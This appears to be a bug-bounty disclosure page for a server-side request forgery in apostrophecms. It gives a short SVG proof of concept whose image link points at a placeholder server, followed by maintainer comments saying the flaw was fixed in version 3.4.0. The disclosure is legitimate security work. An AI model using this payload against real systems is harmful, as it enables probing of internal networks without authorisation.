Server-Side Request Forgery (SSRF) in apostrophecms/apostrophe

Valid

Reported on

Aug 17th 2021


✍️ Description

Rendering Of SVG file causes SSRF

🕵️‍♂️ Proof of Concept

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="200" width="200" xlink:href="http://<EXAMPLE_SERVER>/image.jpeg" />
</svg>

upload the svg file with the payload mentioned above [change server name] and preview it. then check the server for incoming request. <--------------------------------------------------------------------------------------------------------------------------------------->

💥 Impact

SSRF basic attack -> host redirect , further researches of this attack may leads to XXE

We have contacted a member of the apostrophecms/apostrophe team and are waiting to hear back 2 years ago
Alex Bea validated this vulnerability 2 years ago
Ajmal Aboobacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tom Boutell
2 years ago

Maintainer


This has been fixed by the core team in version 3.4.0.

Tom Boutell
2 years ago

Maintainer


Thank you for reporting it.

Tom Boutell
2 years ago

Maintainer


( I can't report this fixed via the menus because there's no provision there for a fix that was already released in the main branch and no longer exists in a separate branch. Here's a link to the code change though: https://github.com/apostrophecms/apostrophe/pull/3394 )

Tom Boutell
2 years ago

Maintainer


Ah, I was able to confirm it fixed on another report.

Tom Boutell marked this as fixed with commit c8b94e 2 years ago
Tom Boutell has been awarded the fix bounty
This vulnerability will not receive a CVE
0x9x
2 years ago

Nice! but the SVG files upload issue is already been fixed !?

Tom Boutell
2 years ago

Maintainer


Yes, by me (I'm on the core team). If I double-claimed the bounty on another ticket somewhere then some admin should probably revoke one of them and that's fine — I'm just trying to keep folks updated on whether these issues are still in play.

Tom Boutell
2 years ago

Maintainer


(Don't really care about the bounty personally or know what the policy is on that, just want it clear what's been fixed)

0x9x
2 years ago

This report is a duplicate of another ! Link --> https://www.huntr.dev/bounties/418f3867-d3b3-4fc7-bcdf-400cf86e7123/

if i want to demonstrate it with an SSRF Scenario , i would do this .

Tom Boutell
2 years ago

Maintainer


As stated on that ticket you linked to this has already been fixed. If you can still do it on our public demo please provide complete instructions to reproduce that here. Thank you.

to join this conversation